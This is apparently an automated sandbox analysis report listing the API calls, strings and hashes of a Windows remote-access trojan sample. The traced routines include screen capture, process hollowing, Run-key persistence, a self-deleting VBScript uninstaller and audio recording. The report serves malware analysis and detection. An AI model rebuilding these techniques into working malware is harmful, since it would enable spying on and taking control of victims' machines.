                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction ID: 4524214b148ab43ddff2c3a4e56364f4d43a0700c24f520c9d4403447d2986ae
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: DF01F7736517008FDFA1CF20C804BAA33E6FBC5206F0540A4DA0697646E370A8418B80
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                    • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                  • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                  • DeleteDC.GDI32(?), ref: 0041805D
                                                  • DeleteDC.GDI32(00000000), ref: 00418060
                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                  • GetCursorInfo.USER32(?), ref: 004180B5
                                                  • GetIconInfo.USER32(?,?), ref: 004180CB
                                                  • DeleteObject.GDI32(?), ref: 004180FA
                                                  • DeleteObject.GDI32(?), ref: 00418107
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                  • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                  • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                  • DeleteDC.GDI32(?), ref: 0041827F
                                                  • DeleteDC.GDI32(00000000), ref: 00418282
                                                  • DeleteObject.GDI32(00000000), ref: 00418285
                                                  • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                  • DeleteObject.GDI32(00000000), ref: 00418344
                                                  • GlobalFree.KERNEL32(?), ref: 0041834B
                                                  • DeleteDC.GDI32(?), ref: 0041835B
                                                  • DeleteDC.GDI32(00000000), ref: 00418366
                                                  • DeleteDC.GDI32(?), ref: 00418398
                                                  • DeleteDC.GDI32(00000000), ref: 0041839B
                                                  • DeleteObject.GDI32(?), ref: 004183A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 1352755160-865373369
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                  • ResumeThread.KERNEL32(?), ref: 00417582
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                  • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                  • GetLastError.KERNEL32 ref: 004175C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                  • API String ID: 4188446516-108836778
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                  • ExitProcess.KERNEL32 ref: 0041151D
                                                    • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                    • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                    • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                  • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                  • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                    • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                    • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                    • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                  • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                    • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                  • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                  • API String ID: 4250697656-2665858469
                                                  • Opcode ID: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                  • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                  • Opcode Fuzzy Hash: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                  • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                  APIs
                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                    • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                  • ExitProcess.KERNEL32 ref: 0040C63E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                  • API String ID: 1861856835-3168347843
                                                  • Opcode ID: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                  • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                  • Opcode Fuzzy Hash: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                  • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                  APIs
                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                  • ExitProcess.KERNEL32 ref: 0040C287
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                  • API String ID: 3797177996-1998216422
                                                  • Opcode ID: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                  • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                  • Opcode Fuzzy Hash: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                  • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                  • SetEvent.KERNEL32 ref: 0041A38A
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                  • CloseHandle.KERNEL32 ref: 0041A3AB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                  • API String ID: 738084811-1408154895
                                                  • Opcode ID: 6261fb2c15adf737ba8f5a3cc6e343ac48bdd48161021fbf453f9a3f532e97f5
                                                  • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                  • Opcode Fuzzy Hash: 6261fb2c15adf737ba8f5a3cc6e343ac48bdd48161021fbf453f9a3f532e97f5
                                                  • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 0210153B
                                                  • ExitProcess.KERNEL32 ref: 02101784
                                                    • Part of subcall function 021028C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 021028E0
                                                    • Part of subcall function 021028C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 021028F9
                                                    • Part of subcall function 021028C4: RegCloseKey.ADVAPI32(?), ref: 02102904
                                                    • Part of subcall function 0210B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,020F3D5A,00465324), ref: 0210B89A
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 021015C2
                                                  • OpenProcess.KERNEL32(00100000,00000000,020FE3BB,?,?,?,?,00000000), ref: 021015D1
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 021015DC
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 021015E3
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 021015E9
                                                    • Part of subcall function 02102A3C: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 02102A4A
                                                    • Part of subcall function 02102A3C: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A65
                                                    • Part of subcall function 02102A3C: RegCloseKey.ADVAPI32(?,?,?,?,020FBBB3,004660E0,00000001,000000AF,00465554), ref: 02102A70
                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 0210161A
                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 02101676
                                                  • GetTempFileNameW.KERNEL32(?,0046B7CC,00000000,?,?,?,?,?,?,?,?,00000000), ref: 02101690
                                                  • lstrcatW.KERNEL32(?,0046B7D8,?,?,?,?,?,?,?,00000000), ref: 021016A2
                                                    • Part of subcall function 0210B7F6: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B852
                                                    • Part of subcall function 0210B7F6: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B866
                                                    • Part of subcall function 0210B7F6: CloseHandle.KERNEL32(00000000,?,00000000,0210B90C,00000000,00000000,?,?,020FA270), ref: 0210B873
                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 0210172B
                                                  • OpenProcess.KERNEL32(00100000,00000000,020FE3BB,?,?,?,?,00000000), ref: 02101740
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 0210174B
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 02101752
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 02101758
                                                    • Part of subcall function 0210B7F6: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0210B90C,00000000,00000000,?), ref: 0210B835
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExistsExitMutexNamePointerQuerySleepWritelstrcat
                                                  • String ID: 0DG$@CG$WDH$exepath
                                                  • API String ID: 1212092484-1464086911
                                                  • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                  • Instruction ID: 71399f53636a955b96195849f11b8ee8d596d9b7dd0cd4c06c5052531c6b3220
                                                  • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                  • Instruction Fuzzy Hash: 0451E371A843056FDB10A7A0AC88EFE336EEB04755F1040B5FD05A71D2EFB89E41CA58
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                  • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                  • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                  • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                  • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                  • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                  • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                  • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                  • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                  • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                  • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                  • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Write$Create
                                                  • String ID: RIFF$WAVE$data$fmt
                                                  • API String ID: 1602526932-4212202414
                                                  • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                  • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                  • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                  • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000001,004068B2,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: C:\Users\user\Desktop\yPIOW6yoPi.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                  • API String ID: 1646373207-2461552386
                                                  • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                  • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                  • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                  • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                  APIs
                                                  • CreateDCA.GDI32(0046BAC8,00000000,00000000,00000000), ref: 02108220
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0210822B
                                                    • Part of subcall function 021086B9: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 021086E9
                                                  • CreateCompatibleBitmap.GDI32(?,00000000), ref: 021082AC
                                                  • SelectObject.GDI32(00000000,00000000), ref: 021082D2
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 021082FA
                                                  • GetCursorInfo.USER32(?), ref: 0210831C
                                                  • GetIconInfo.USER32(?,?), ref: 02108332
                                                  • DeleteObject.GDI32(?), ref: 02108361
                                                  • DeleteObject.GDI32(?), ref: 0210836E
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 0210837B
                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00471DE4,00000000,00000000,00660046), ref: 021083AB
                                                  • GetObjectA.GDI32(?,00000018,?), ref: 021083DA
                                                  • LocalAlloc.KERNEL32(00000040,00000028), ref: 02108423
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 02108446
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 021084AF
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 021084D2
                                                  • DeleteObject.GDI32(00000000), ref: 021084EC
                                                  • GlobalFree.KERNEL32(00CC0020), ref: 021084F7
                                                  • DeleteObject.GDI32(00000000), ref: 021085AB
                                                  • GlobalFree.KERNEL32(?), ref: 021085B2
                                                  • DeleteObject.GDI32(?), ref: 02108608
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object$Delete$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                  • String ID:
                                                  • API String ID: 615876539-0
                                                  • Opcode ID: 86e38cefe18f60a5317b990390b8ef0f53fe4f457a10542f643d98f04a2d82c8
